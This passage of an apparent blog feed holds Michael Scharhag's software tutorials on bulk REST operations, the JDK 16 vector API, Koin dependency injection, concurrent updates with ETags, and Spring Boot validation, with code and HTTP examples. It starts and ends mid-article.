<p>Multipart messages seem like a nice way to merge multiple HTTP messages into a single message as it uses a standardized and generally understood technique.</p>
<p>However, there is one big caveat here. Clients and the server need to be able to construct and process the actual HTTP messages in raw text format. Usually this functionality is hidden behind HTTP client libraries and server side frameworks and might not be easily accessible.</p>
<h2>Bulk operations on REST resources</h2>
<p>In the previous examples we used a generic <em>/batch</em> endpoint that can be used to modify many different types of resources in a single request. Now we will apply bulk operations on a specific set of resources to move a bit into a more <em>rest-like</em> style.</p>
<p>Sometimes only a single operation needs to support bulk data. In such a case, we can simply create a new resource that accepts a collection of bulk entries.</p>
<p>For example, assume we want to import a couple of products with a single request:</p>
<pre>
POST /product-import
</pre>
<pre>
[
{
"name": "Cool Gadget",
"price": "$ 12.45 USD"
},
{
"name": "Very cool Gadget",
"price": "$ 19.99 USD"
},
...
]</pre>
<p>A simple response body might look like this:</p>
<pre>
[
{
"status": "imported",
"id": 234235
},
{
"status": "failed"
"error": "Product name too long, max 15 characters allowed"
},
...
]</pre>
<p>Again we return a collection containing details about every entry. As we provide a response to a specific operation (<em>importing products</em>) there is not need to use a generic response format. Instead, we can use a specific format that communicates the import status and potential import errors.</p>
<h2>Partially updating collections</h2>
<p>In a <a href="https://www.mscharhag.com/api-design/rest-partial-updates-patch" target="_blank">previous post</a> we learned that PATCH can be used for partial modification of resources. PATCH can also use a separate format to describe the desired changes.</p>
<p>Both sound useful for implementing bulk operations. By using PATCH on a resource collection (e.g. <em>/products</em>) we can <em>partially modify the collection</em>. We can use this to add new elements to the collection or update existing elements.</p>
<p>For example we can use the following snippet to modify the <em>/products</em> collection:</p>
<pre>
PATCH /products
</pre>
<pre>
[
{
"action": "replace",
"path": "/123",
"value": {
"name": "Yellow cap",
"description": "It's a cap and it's yellow"
}
},
{
"action": "delete",
"path": "/124",
},
{
"action": "create",
"value": {
"name": "Cool new product",
"description": "It is very cool!"
}
}
]</pre>
<p>Here we perform three operations on the <em>/products</em> collection in a single request. We update resource <em>/products/123</em> with new information, delete resource <em>/products/124</em> and create a completely new product.</p>
<p>A response might look somehow like this:</p>
<pre>
[
{
"action": "replace",
"path": "/123",
"status": "success"
},
{
"action": "delete",
"path": "/124",
"status": "success"
}, {
"action": "create",
"status": "success"
}
]</pre>
<p>Here we need to use a generic response entry format again as it needs to be compatible to all possible request actions.</p>
<p>However, it would be too easy without a huge caveat: PATCH requires changes to be applied atomically.</p>
<p>The <a href="https://tools.ietf.org/html/rfc5789" target="_blank">RFC</a> says:</p>
<blockquote>
<p>The server MUST apply the entire set of changes atomically and never provide [..] a partially modified representation. If the entire patch document cannot be successfully applied, then the server MUST NOT apply any of the changes.</p>
</blockquote>
<p>I usually would not recommend to implement bulk operation in an atomic way as this can increase complexity a lot.</p>
<p>A simple workaround to be compatible with the HTTP specifications is to create a separate sub-resource and use POST instead of PATCH.</p>
<p>For example:</p>
<pre>
POST /products/batch
</pre>
<p>(same request body as the previous PATCH request)</p>
<p>If you really want to go the atomic way, you might need to think about the response format again. In this case, it is not possible that some requested changes are applied while others are not. Instead you need to communicate what requested changes failed and which could have been applied if everything else would have worked.</p>
<p>In this case, a response might look like this:</p>
<pre>
[
{
"action": "replace",
"path": "/123",
"status": "rolled back"
},
{
"action": "delete",
"path": "/124",
"status": "failed",
"error": "resource not found"
},
..
]</pre>
<h2>Which HTTP status code is appropriate for responses to bulk requests?</h2>
<p>With bulk requests we have the problem than some parts of the request might execute successfully while other fail. If everything worked it is easy, in this case we can simply return HTTP 200 OK.</p>
<p>Even if all requested changes fail it can be argued that HTTP 200 is still a valid response code as long as the bulk operation itself completed successfully.</p>
<p>In either way the client needs to process the response body to get detailed information about the processing status.</p>
<p>Another idea that might come in mind is HTTP 207 (Multi-status). HTTP 207 is part of <a href="https://tools.ietf.org/html/rfc4918" target="_blank">RFC 4918</a> (HTTP extensions for WebDAV) and described like this:</p>
<blockquote>
<p>A Multi-Status response conveys information about multiple resources in situations where multiple status codes might be appropriate. [..] Although '207' is used as the overall response status code, the recipient needs to consult the contents of the multistatus response body for further information about the success or failure of the method execution. The response MAY be used in success, partial success and also in failure situations.</p>
</blockquote>
<p>So far this reads like a great fit.</p>
<p>Unfortunately HTTP 207 is part of the Webdav specification and requires a specific response body format that looks like this:</p>
<pre class="brush: xml">
<?xml version="1.0" encoding="utf-8" ?>
<d:multistatus xmlns:d="DAV:">
<d:response>
<d:href>http://www.example.com/container/resource3</d:href>
<d:status>HTTP/1.1 423 Locked</d:status>
<d:error><d:lock-token-submitted/></d:error>
</d:response>
</d:multistatus></pre>
<p>This is likely not the response format you want. Some might argue that it is fine to reuse HTTP 207 with a custom response format. Personally I would not recommend doing this and instead use a simple HTTP 200 status code.</p>
<p>In case you the bulk request is processed asynchronously HTTP 202 (Accepted) is the status code to use.</p>
<h2>Summary</h2>
<p>We looked at different approaches of building bulk APIs. All approaches have different up- and downsides. There is no single correct way as it always depends on your requirements.</p>
<p>If you need a generic way to submit multiple actions in a single request you can use a custom JSON format. Alternatively you can use a multipart content-type to merge multiple requests into a single request.</p>
<p>You can also come up with separate resources that that express the desired operation. This is usually the simplest and most pragmatic way if you only have one or a few operations that need to support bulk operations.</p>
<p>In all scenarios you should evaluate if bulk operations really produce the desired performance gains. Otherwise, the additional complexity of bulk operations is usually not worth the effort.</p>
<p> </p>
<h3><em>Interested in more REST related articles? Have a look at my <a href="https://www.mscharhag.com/p/rest-api-design" target="_blank">REST API design page</a>.</em></h3>2021-05-03T19:51:23ZLooking into the JDK 16 vector APIMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2021-03-31:7e78b797-9f16-4e25-9388-aae50527a9f02021-04-06T16:09:09Z2021-04-08T12:26:57Z<p><a href="https://openjdk.java.net/projects/jdk/16/" rel="nofollow" target="_blank">JDK 16</a> comes with the incubator module <span class="code">jdk.incubator.vector</span> (<a href="https://openjdk.java.net/jeps/338" rel="nofollow" target="_blank">JEP 338</a>) which provides a portable API for expressing vector computations. In this post we will have a quick look at this new API.</p>
<p>Note that the API is in incubator status and likely to change in future releases.</p>
<h2>Why vector operations?</h2>
<p>When supported by the underlying hardware vector operations can increase the number of computations performed in a single CPU cycle.</p>
<p>Assume we want to add two vectors each containing a sequence of four integer values. Vector hardware allows us to perform this operation (four integer additions in total) in a single CPU cycle. Ordinary additions would only perform one integer addition in the same time.</p>
<p>The new vector API allows us to define vector operations in a platform agnostic way. These operations then compile to vector hardware instructions at runtime.</p>
<p>Note that HotSpot already supports auto-vectorization which can transform scalar operations into vector hardware instructions. However, this approach is quite limited and utilizes only a small set of available vector hardware instructions.</p>
<p>A few example domains that might benefit from the new vector API are machine learning, linear algebra or cryptography.</p>
<h2>Enabling the vector incubator module (<span class="code">jdk.incubator.vector</span>)</h2>
<p>To use the new vector API we need to use JDK 16 (or newer). We also need to add the <span class="code">jdk.incubator.vector</span> module to our project. This can be done with a <span class="code">module-info.java</span> file:</p>
<pre class="brush: java">
module com.mscharhag.vectorapi {
requires jdk.incubator.vector;
}</pre>
<h2>Implementing a simple vector operation</h2>
<p>Let's start with a simple example:</p>
<pre class="brush: java">
float[] a = new float[] {1f, 2f, 3f, 4f};
float[] b = new float[] {5f, 8f, 10f, 12f};
FloatVector first = FloatVector.fromArray(FloatVector.SPECIES_128, a, 0);
FloatVector second = FloatVector.fromArray(FloatVector.SPECIES_128, b, 0);
FloatVector result = first
.add(second)
.pow(2)
.neg();</pre>
<p>We start with two float arrays (<span class="code">a</span> and <span class="code">b</span>) each containing four elements. These provide the input data for our vectors.</p>
<p>Next we create two <span class="code">FloatVector</span>s using the static <span class="code">fromArray(..)</span> factory method. The first parameter defines the size of the vector in bits (here 128). Using the last parameter we are able to define an offset value for the passed arrays (here we use 0)</p>
<p>In Java a <span class="code">float</span> value has a size of four bytes (= 32 bits). So, four float values match exactly the size of our vector (128 bits).</p>
<p>After that, we can define our vector operations. In this example we add both vectors together, then we square and negate the result.</p>
<p>The resulting vector contains the values:</p>
<pre>
[-36.0, -100.0, -169.0, -256.0]</pre>
<p>We can write the resulting vector into an array using the <span class="code">intoArray(..)</span> method:</p>
<pre class="brush: java">
float[] resultArray = new float[4];
result.intoArray(resultArray, 0);</pre>
<p>In this example we use <span class="code">FloatVector</span> to define operations on float values. Of course we can use other numeric types too. Vector classes are available for <span class="code">byte</span>, <span class="code">short</span>, <span class="code">integer</span>, <span class="code">float</span> and <span class="code">double</span> (<span class="code">ByteVector</span>, <span class="code">ShortVector</span>, etc.).</p>
<h2>Working with loops</h2>
<p>While the previous example was simple to understand it does not show a typical use case of the new vector API. To gain any benefits from vector operations we usually need to process larger amounts of data.</p>
<p>In the following example we start with three arrays <span class="code">a</span>, <span class="code">b</span> and <span class="code">c</span>, each having 10000 elements. We want to add the values of <span class="code">a</span> and <span class="code">b</span> and store it in <span class="code">c</span>: <span class="code">c[i] = a[i] + b[i]</span>.</p>
<p>Our code looks like this:</p>
<pre class="brush: java">
final VectorSpecies<Float> SPECIES = FloatVector.SPECIES_128;
float[] a = randomFloatArray(10_000);
float[] b = randomFloatArray(10_000);
float[] c = new float[10_000];
for (int i = 0; i < a.length; i += SPECIES.length()) {
VectorMask<Float> mask = SPECIES.indexInRange(i, a.length);
FloatVector first = FloatVector.fromArray(SPECIES, a, i, mask);
FloatVector second = FloatVector.fromArray(SPECIES, b, i, mask);
first.add(second).intoArray(c, i, mask);
}</pre>
<p>Here we iterate over the input arrays in strides of vector length. A <span class="code">VectorMask</span> helps us if vectors cannot be completely filled from input data (e.g. during the last loop iteration).</p>
<h2>Summary</h2>
<p>We can use the new vector API to define vector operations for optimizing computations for vector hardware. This way we can increase the number of computations performed in a single CPU cycle. Central element of the vector API are type specific vector classes like <span class="code">FloatVector</span> or <span class="code">LongVector</span>.</p>
<p>You can find the example source code on <a href="https://github.com/mscharhag/blog-examples/blob/master/jdk16-vector-api/src/main/java/com/mscharhag/vectorapi/Main.java" target="_blank">GitHub</a>.</p>2021-04-08T12:26:57ZKotlin dependency injection with KoinMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2021-03-01:43fa632b-e18d-4413-a8f5-9eee98b7cc2d2021-03-08T07:29:19Z2021-03-08T07:29:22Z<p><a href="https://en.wikipedia.org/wiki/Dependency_injection" rel="nofollow"" target="_blank">Dependency injection</a> is a common technique in today's software design. With dependency injection we pass dependencies to a component instead of creating it inside the component. This way we can separate construction and use of dependencies.</p>
<p>In this post we will look at <a href="https://github.com/InsertKoinIO/koin" rel="nofollow"" target="_blank">Koin</a>, a lightweight Kotlin dependency injection library. Koin describes itself as <em>a DSL, a light container and a pragmatic API</em>.</p>
<h2>Getting started with Koin</h2>
<p>We start with adding the Koin dependency to our project:</p>
<pre class="brush: xml">
<dependency>
<groupId>org.koin</groupId>
<artifactId>koin-core</artifactId>
<version>2.2.2</version>
</dependency></pre>
<p>Koin artifacts are available on <em>jcenter.bintray.com</em>. If not already available you can add this repository with:</p>
<pre class="brush: xml">
<repositories>
<repository>
<id>central</id>
<name>bintray</name>
<url>https://jcenter.bintray.com</url>
</repository>
</repositories>
</pre>
<p>Or if you are using Gradle:</p>
<pre class="brush: xml">
repositories {
jcenter()
}
dependencies {
compile "org.koin:koin-core:2.2.2"
}
</pre>
<p>Now let's create a simple <span class="code">UserService</span> class with a dependency to an <span class="code">AddressValidator</span> object:</p>
<pre class="brush: java">
class UserService(
private val addressValidator: AddressValidator
) {
fun createUser(username: String, address: Address) {
// use addressValidator to validate address before creating user
}
}</pre>
<p><span class="code">AddressValidator</span> simply looks like this:</p>
<pre class="brush: java">
class AddressValidator {
fun validate(address: Address): Boolean {
// validate address
}
}</pre>
<p>Next we will use Koin to wire both components together. We do this by creating a Koin module:</p>
<pre class="brush: java">
val myModule = module {
single { AddressValidator() }
single(createdAtStart = true) { UserService(get()) }
}</pre>
<p>This creates a module with two singletons (defined by the <span class="code">single</span> function). <span class="code">single</span> accepts a lambda expression as parameter that is used to create the component. Here, we simply call the constructors of our previously defined classes.</p>
<p>With <span class="code">get()</span> we can resolve dependencies from a Koin module. In this example we use <span class="code">get()</span> to obtain the previously defined <span class="code">AddressValidator</span> instance and pass it to the <span class="code">UserService</span> constructor.</p>
<p>The <span class="code">createdAtStart</span> option tells Koin to create this instance (and its dependencies) when the Koin application is started.</p>
<p>We start a Koin application with:</p>
<pre class="brush: java">
val app = startKoin {
modules(myModule)
}</pre>
<p><span class="code">startKoin</span> launches the Koin container which loads and initializes dependencies. One or more Koin modules can be passed to the <span class="code">startKoin</span> function. A <span class="code">KoinApplication</span> object is returned.</p>
<h2>Retrieving objects from the Koin container</h2>
<p>Sometimes it necessary to retrieve objects from the Koin dependency container. This can be done by using the <span class="code">KoinApplication</span> object returned by the <span class="code">startKoin</span> function:</p>
<pre class="brush: java">
// retrieve UserService instance from previously defined module
val userService = app.koin.get<UserService>()</pre>
<p>Another approach is to use the <span class="code">KoinComponent</span> interface. <span class="code">KoinComponent</span> provides an inject method we use to retrieve objects from the Koin container. For example:</p>
<pre class="brush: java">
class MyApp : KoinComponent {
private val userService by inject<UserService>()
...
}</pre>
<h2>Factories</h2>
<p>Sometimes object creation is not as simple as just calling a constructor. In this case, a factory method can come in handy. Koin's usage of lambda expressions for object creation support us here. We can simply call factory functions from the lambda expression.</p>
<p>For example, assume the creation of a <span class="code">UserService</span> instance is more complex. We can come up with something like this:</p>
<pre class="brush: java">
val myModule = module {
fun provideUserService(addressValidator: AddressValidator): UserService {
val userService = UserService(addressValidator)
// more code to configure userService
return userService
}
single { AddressValidator() }
single { provideUserService(get()) }
}</pre>
<p>As mentioned earlier, <span class="code">single</span> is used to create singletons. This means Koin creates only one object instance that is then shared by other objects.</p>
<p>However, sometimes we need a new object instance for every dependency. In this case, the <span class="code">factory</span> function helps us:</p>
<pre class="brush: java">
val myModule = module {
factory { AddressValidator() }
single { UserService(get()) }
single { OtherService(get()) } // OtherService constructor takes an AddressValidator instance
}</pre>
<p>With <span class="code">factory</span> Koin creates a new <span class="code">AddressValidator</span> objects whenever an <span class="code">AddressValidator</span> is needed. Here, <span class="code">UserService</span> and <span class="code">OtherService</span> get two different <span class="code">AddressValidator</span> instances via <span class="code">get()</span>.</p>
<h2>Providing interface implementations</h2>
<p>Let's assume <span class="code">AddressValidator</span> is an interface that is implemented by <span class="code">AddressValidatorImpl</span>. We can still write our Koin module like this:</p>
<pre class="brush: java">
val myModule = module {
single { AddressValidatorImpl() }
single { UserService(get()) }
}</pre>
<p>This defines a <span class="code">AddressValidatorImpl</span> instance that can be injected to other components. However, it is likely that <span class="code">AddressValidatorImpl</span> should only expose the <span class="code">AddressValidator</span> interface. This way we can enforce that other components only depend on <span class="code">AddressValidator</span> and not on a specific interface implementation. We can accomplish this by adding a generic type to the <span class="code">single</span> function:</p>
<pre class="brush: java">
val myModule = module {
single<AddressValidator> { AddressValidatorImpl() }
single { UserService(get()) }
}</pre>
<p>This way we expose only the <span class="code">AddressValidator</span> interface by creating a <span class="code">AddressValidatorImpl</span> instance.</p>
<h2>Properties and configuration</h2>
<p>Obtaining properties from a configuration file is a common task. Koin supports loading property files and giving us the option to inject properties.</p>
<p>First we need to tell Koin to load properties which is done by using the <span class="code">fileProperties</span> function. <span class="code">fileProperties</span> has an optional <span class="code">fileName</span> argument we can use to specify a path to a property file. If no argument is given Koin tries to load <em>koin.properties</em> from the classpath.</p>
<p>For example:</p>
<pre class="brush: java">
val app = startKoin {
// loads properties from koin.properties
fileProperties()
// loads properties from custom property file
fileProperties("/other.properties")
modules(myModule)
}</pre>
<p>Assume we have a component that requires some configuration property:</p>
<pre class="brush: java">
class ConfigurableComponent(val someProperty: String)</pre>
<p>.. and a <em>koin.properties</em> file with a single entry:</p>
<pre class="brush: xml">
foo.bar=baz</pre>
<p>We can now retrieve this property and inject it to <span class="code">ConfigurableComponent</span> by using the <span class="code">getProperty</span> function:</p>
<pre class="brush: java">
val myModule = module {
single { ConfigurableComponent(getProperty("foo.bar")) }
}</pre>
<h2>Summary</h2>
<p>Koin is an easy to use dependency injection container for Kotlin. Koin provides a simple DSL to define components and injection rules. We use this DSL to create Koin modules which are then used to initialize the dependency injection container. Koin is also able to inject properties loaded from files.</p>
<p>For more information you should visit the <a href="https://insert-koin.io/docs/reference/introduction/" rel="nofollow" target="_blank">Koin documentation</a> page. You can find the sources for this post on <a href="https://github.com/mscharhag/blog-examples/tree/master/kotlin-koin-example" target="_blank">GitHub</a>.</p>2021-03-08T07:29:22ZREST API Design: Dealing with concurrent updatesMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2021-02-14:3fc7cdab-ddfe-450f-b41c-b78391bf74fb2021-06-13T16:09:49Z2021-02-18T17:09:49Z<p>Concurrency control can be an important part of a REST API, especially if you expect concurrent update requests for the same resource. In this post we will look at different options to avoid lost updates over HTTP.</p>
<p>Let's start with an example request flow, to understand the problem:</p>
<p><a href="https://www.mscharhag.com/files/2021/rest-concurrent-updates.jpg" target="_blank"><img alt="" src="https://www.mscharhag.com/files/2021/rest-concurrent-updates.jpg" style="width: 100%; max-width: 700px" /></a></p>
<p>We start with Alice and Bob requesting the resource <em>/articles/123</em> from the server which responds with the current resource state. Then, Bob executes an update request based on the previously received data. Shorty after that, Alice also executes an update request. Alice's request is also based on the previously received resource and does not include the changes made by Bob. After the server finished processing Alice's update Bob's changes have been lost.</p>
<p>HTTP provides a solution for this problem: <a href="https://tools.ietf.org/html/rfc7232" rel="nofollow" target="_blank">Conditional requests, defined in RFC 7232</a>.</p>
<p>Conditional requests use validators and preconditions defined in specific headers. Validators are metadata generated by the server that can be used to define preconditions. For example, last modification dates or ETags are validators that can be used for preconditions. Based on those preconditions the server can decide if an update request should be executed.</p>
<p>For state changing requests the <em>If-Unmodified-Since</em> and <em>If-Match</em> headers are particularly interesting. We will learn how to avoid concurrent updates using those headers in the next sections.</p>
<h2>Using a last modification date with an <em>If-Unmodified-Since</em> header</h2>
<p>Probably the easiest way to avoid lost updates is the use of a last modification date. Saving the date of last modification for a resource is often a good idea so it is likely we already have this value in our database. If this is not the case, it is often very easy to add.</p>
<p>When returning a response to the client we can now add the last modification date in the <em>Last-Modified</em> response header. The <em>Last-Modified</em> header uses the following format:</p>
<pre>
<day-name>, <day> <month-name> <year> <hour>:<minute>:<second> GMT</pre>
<p>For example:</p>
<p>Request:</p>
<pre>
GET /articles/123</pre>
<p>Response:</p>
<pre>
HTTP/1.1 200 OK
Last-Modified: Sat, 13 Feb 2021 12:34:56 GMT
{
"title": "Sunny summer",
"text": "bla bla ..."
}</pre>
<p>To update this resource the client now has to add the <em>If-Unmodified-Since</em> header to the request. The value of this header is set to the last modification date retrieved from the previous GET request.</p>
<p>Example update request:</p>
<pre>
PUT /articles/123
If-Unmodified-Since: Sat, 13 Feb 2021 12:34:56 GMT
{
"title": "Sunny winter",
"text": "bla bla ..."
}</pre>
<p>Before executing the update, the server has to compare the last modification date of the resource with the value from the <em>If-Unmodified-Since</em> header. The update is only executed if both values are identical.</p>
<p>One might argue that it is enough to check if the last modification date of the resource is newer than the value of the <em>If-Unmodified-Since</em> header. However, this gives clients the option to overrule other concurrent requests by sending a modified last modification date (e.g. a future date).</p>
<p>A problem with this approach is that the precision of the <em>Last-Modified</em> header is limited to seconds. If multiple concurrent update requests are executed in the same second, we can still run into the lost update problem.</p>
<h2>Using an ETag with an <em>If-Match</em> header</h2>
<p>Another approach is the use of an entity tag (ETag). ETags are opaque strings generated by the server for the requested resource representation. For example, the hash of the resource representation can be used as ETag.</p>
<p>ETags are sent to the client using the <em>ETag </em>Header. For example:</p>
<p>Request:</p>
<pre>
GET /articles/123</pre>
<p>Response:</p>
<pre>
HTTP/1.1 200 OK
ETag: "a915ecb02a9136f8cfc0c2c5b2129c4b"
{
"title": "Sunny summer",
"text": "bla bla ..."
}</pre>
<p>When updating the resource, the client sends the ETag<em> </em>in a <em>If-Match</em> header back to the server:</p>
<pre>
PUT /articles/123
If-Match: "a915ecb02a9136f8cfc0c2c5b2129c4b"
{
"title": "Sunny winter",
"text": "bla bla ..."
}</pre>
<p>The server now verifies that the <em>ETag </em>matches the current representation of the resource. If the ETag does not match, the resource state on the server has been changed between GET and PUT requests.</p>
<h2>Strong and weak validation</h2>
<p><a href="https://tools.ietf.org/html/rfc7232" target="_blank">RFC 7232</a> differentiates between weak and strong validation:</p>
<blockquote>
<p>Weak validators are easy to generate but are far less useful for comparisons. Strong validators are ideal for comparisons but can be very difficult (and occasionally impossible) to generate efficiently.</p>
</blockquote>
<p><em>Strong </em>validators change whenever a resource representation changes. In contrast <em>weak </em>validators do not change every time the resource representation changes.</p>
<p>ETags can be generated in weak and strong variants. Weak ETags must be prefixed by <em>W/</em>.</p>
<p>Here are a few example ETags:</p>
<p>Weak ETags:</p>
<pre>
ETag: W/"abcd"
ETag: W/"123"</pre>
<p>Strong ETags:</p>
<pre>
ETag: "a915ecb02a9136f8cfc0c2c5b2129c4b"
ETag: "ngl7Kfe73Mta"</pre>
<p>Note that the ETag must be placed withing double quotes, so the shown quotes are not optional.</p>
<p>Besides concurrency control, preconditions are often used for caching and bandwidth reduction. In these situations weak validators can be good enough. For concurrency control in REST APIs strong validators are usually preferable.</p>
<p>Note that using <em>Last-Modified</em> and <em>If-Unmodified-Since</em> headers is considered weak because of the limited precision. We cannot be sure that the server state has been changed by another request in the same second. However, it depends on the number of concurrent update requests you expect if this is an actual problem.</p>
<h2>Computing ETags</h2>
<p>Strong ETags have to be unique for all versions of all representations for a particular resource. For example, JSON and XML representations of the same resource should have different ETags.</p>
<p>Generating and validating strong ETags can be a bit tricky. For example, assume we generate an ETag by hashing a JSON representation of a resource before sending it to the client. To validate the ETag for an update request we now have to load the resource, convert it to JSON and then hash the JSON representation.</p>
<p>In the best case resources contain an implementation-specific field that tracks changes. This can be a precise last modification date or some form of internal revision number. For example, when using database frameworks like <em>Java Persistence API</em> (JPA) with optimistic locking we might already have a <em>version </em>field that increases with every change.</p>
<p>We can then compute an ETag by hashing the resource id, the media-type (e.g. <em>application/json</em>) together with the last modification date or the revision number.</p>
<h2>HTTP status codes and execution order</h2>
<p>When working with preconditions, two HTTP status codes are relevant:</p>
<ul>
<li>412 - <em>Precondition failed</em> indicates that one or more preconditions evaluated to false on the server (e.g. because the resource state has been changed on the server)</li>
<li>428 - <em>Precondition required</em> has been added in <a href="https://tools.ietf.org/html/rfc6585" target="_blank">RFC 6585</a> and indicates that the server requires the request to be conditional. The server should return this status code if an update request does not contain a expected preconditions</li>
</ul>
<p><a href="https://tools.ietf.org/html/rfc7232#section-5" target="_blank">RFC 7232</a> also defines the evaluation order for HTTP 412 (Precondition failed):</p>
<blockquote>
<p>[..] a recipient cache or origin server MUST evaluate received request preconditions after it has successfully performed its normal request checks and just before it would perform the action associated with the request method. A server MUST ignore all received preconditions if its response to the same request without those conditions would have been a status code other than a 2xx (Successful) or 412 (Precondition Failed). In other words, redirects and failures take precedence over the evaluation of preconditions in conditional requests.</p>
</blockquote>
<p>This usually results in the following processing order of an update request:</p>
<p><a href="https://www.mscharhag.com/files/2021/rest-concurrent-updates-processing-order.jpg" target="_blank"><img alt="" src="https://www.mscharhag.com/files/2021/rest-concurrent-updates-processing-order.jpg" style="width: 100%; max-width: 600px" /></a></p>
<p>Before evaluating preconditions, we check if the request fulfills all other requirements. When this is not the case, we respond with a standard <em>4xx</em> status code. This way we make sure that other errors are not suppressed by the 412 status code.</p>
<p> </p>
<h3><em>Interested in more REST related articles? Have a look at my <a href="https://www.mscharhag.com/p/rest-api-design" target="_blank">REST API design page</a>.</em></h3>
<p> </p>2021-02-18T17:09:49ZValidation in Spring Boot applicationsMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2021-02-01:34d5c511-4d46-45a6-a3cd-59e943bd55442021-02-02T22:09:43Z2021-02-02T22:09:54Z<p>Validation in Spring Boot applications can be done in many different ways. Depending on your requirements some ways might fit better to your application than others. In this post we will explore the usual options to validate data in Spring Boot applications.</p>
<p>Validation is done by using the <a href="https://beanvalidation.org/2.0/" rel="nofollow" target="_blank">Bean Validation API</a>. The reference implementation for the Bean Validation API is <a href="https://hibernate.org/validator/" rel="nofollow" target="_blank">Hibernate Validator</a>.</p>
<p>All required dependencies are packaged in the Spring Boot starter POM <span class="code">spring-boot-starter-validation</span>. So usually all you need to get started is the following dependency:</p>
<pre class="brush: xml">
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-validation</artifactId>
</dependency>
</pre>
<p>Validation constraints are defined by annotating fields with appropriate Bean Validation annotations. For example:</p>
<pre class="brush: java">
public class Address {
@NotBlank
@Size(max = 50)
private String street;
@NotBlank
@Size(max = 50)
private String city;
@NotBlank
@Size(max = 10)
private String zipCode;
@NotBlank
@Size(max = 3)
private String countryCOde;
// getters + setters
}</pre>
<p>I think these annotations are quite self-explanatory. We will use this <span class="code">Address</span> class in many of the following examples.</p>
<p>You can find a complete list of build in constraint annotations in the <a href="https://beanvalidation.org/2.0/spec/#builtinconstraints" rel="nofollow" target="_blank">Bean Validation documentation</a>. Of course you can also define you own validation constraints by <a href="https://docs.jboss.org/hibernate/stable/validator/reference/en-US/html_single/#validator-customconstraints" rel="nofollow" target="_blank">creating a custom <span class="code">ConstraintValidator</span></a>.</p>
<p>Defining validation constraints is only one part. Next we need to trigger the actual validation. This can be done by Spring or by manually invoking a <span class="code">Validator</span>. We will see both approaches in the next sections.</p>
<h2>Validating incoming request data</h2>
<p>When building a REST API with Spring Boot it is likely you want to validate incoming request data. This can be done by simply adding the <span class="code">@Valid</span> Annotation to the <span class="code">@RequestBody</span> method parameter. For example:</p>
<pre class="brush: java">
@RestController
public class AddressController {
@PostMapping("/address")
public void createAddress(@Valid @RequestBody Address address) {
// ..
}
}</pre>
<p>Spring now automatically validates the passed <span class="code">Address</span> object based on the previously defined constraints.</p>
<p>This type of validation is usually used to make sure the data sent by the client is syntactically correct. If the validation fails the controller method is not called and a HTTP 400 (Bad request) response is returned to the client. More complex business specific validation constraints should typically be checked later in the business layer.</p>
<h2>Persistence layer validation</h2>
<p>When using a relational database in your Spring Boot application, it is likely that you are also using Spring Data and Hibernate. Hibernate comes with supports for Bean Validation. If your entities contain Bean Validation annotations, those are automatically checked when persisting an entity.</p>
<p>Note that the persistence layer should definitely not be the only location for validation. If validation fails here, it usually means that some sort of validation is missing in other application components. Persistence layer validation should be seen as the last line of defense. In addition to that, the persistence layer is usually too late for business related validation.</p>
<h2>Method parameter validation</h2>
<p>Another option is the <a href="https://www.mscharhag.com/spring/spring-method-parameter-validation" target="_blank">method parameter validation provided by Spring</a>. This allows us to add Bean Validation annotations to method parameters. Spring then uses an AOP interceptor to validate the parameters before the actual method is called.</p>
<p>For example:</p>
<pre class="brush: java">
@Service
@Validated
public class CustomerService {
public void updateAddress(
@Pattern(regexp = "\\w{2}\\d{8}") String customerId,
@Valid Address newAddress
) {
// ..
}
}</pre>
<p>This approach can be useful to validate data coming into your service layer. However, before committing to this approach you should be aware of its limitations as this type of validation only works if Spring proxies are involved. See my separate post about <a href="https://www.mscharhag.com/spring/spring-method-parameter-validation" target="_blank">Method parameter validation</a> for more details.</p>
<p>Note that this approach can make unit testing harder. In order to test validation constraints in your services you now have to bootstrap a Spring application context.</p>
<h2>Triggering Bean Validation programmatically</h2>
<p>In the previous validation solutions the actual validation is triggered by Spring or Hibernate. However, it can be quite viable to trigger validation manually. This gives us great flexibility in integrating validation into the appropriate location of our application.</p>
<p>We start by creating a <span class="code">ValidationFacade</span> bean:</p>
<pre class="brush: java">
@Component
public class ValidationFacade {
private final Validator validator;
public ValidationFacade(Validator validator) {
this.validator = validator;
}
public <T> void validate(T object, Class<?>... groups) {
Set<ConstraintViolation<T>> violations = validator.validate(object, groups);
if (!violations.isEmpty()) {
throw new ConstraintViolationException(violations);
}
}
}</pre>
<p>This bean accepts a <span class="code">Validator</span> as constructor parameter. <span class="code">Validator</span> is part of the Bean Validation API and responsible for validating Java objects. An instance of <span class="code">Validator</span> is automatically provided by Spring, so it can be injected into our <span class="code">ValidationFacade</span>.</p>
<p>Within the <span class="code">validate(..)</span> method we use the <span class="code">Validator</span> to validate a passed <span class="code">object</span>. The result is a <span class="code">Set</span> of <span class="code">ConstraintViolation</span>s. If no validation constraints are violated (= the object is valid) the <span class="code">Set</span> is empty. Otherwise, we throw a <span class="code">ConstraintViolationException</span>.</p>
<p>We can now inject our <span class="code">ValidationFacade</span> into other beans. For example:</p>
<pre class="brush: java">
@Service
public class CustomerService {
private final ValidationFacade validationFacade;
public CustomerService(ValidationFacade validationFacade) {
this.validationFacade = validationFacade;
}
public void updateAddress(String customerId, Address newAddress) {
validationFacade.validate(newAddress);
// ...
}
}</pre>
<p>To validate an object (here <span class="code">newAddress</span>) we simply have to call the <span class="code">validate(..)</span> method of <span class="code">ValidationFacade</span>. Of course we could also inject the <span class="code">Validator</span> directly in our <span class="code">CustomerService</span>. However, in case of validation errors we usually do not want to deal with the returned <span class="code">Set</span> of <span class="code">ConstraintViolation</span>s. Instead it is likely we simply want to throw an exception, which is exactly what <span class="code">ValidationFacade</span> is doing.</p>
<p>Often this is a good approach for validation in the service/business layer. It is not limited to method parameters and can be used with different types of objects. For example, we can load an object from the database, modify it and then validate it before we continue.</p>
<p>This way is also quite good to unit test as we can simply mock <span class="code">ValidationFacade</span>. In case we want real validation in unit tests, the required <span class="code">Validator</span> instance can be created manually (as shown in the next section). Both cases do not require to bootstrap a Spring application context in our tests.</p>
<h2>Validating inside business classes</h2>
<p>Another approach is to move validation inside your actual business classes. When doing Domain Driven Design this can be a good fit. For example, when creating an<span class="code"> Address</span> instance the constructor can make sure we are not able to construct an invalid object:</p>
<pre class="brush: java">
public class Address {
@NotBlank
@Size(max = 50)
private String street;
@NotBlank
@Size(max = 50)
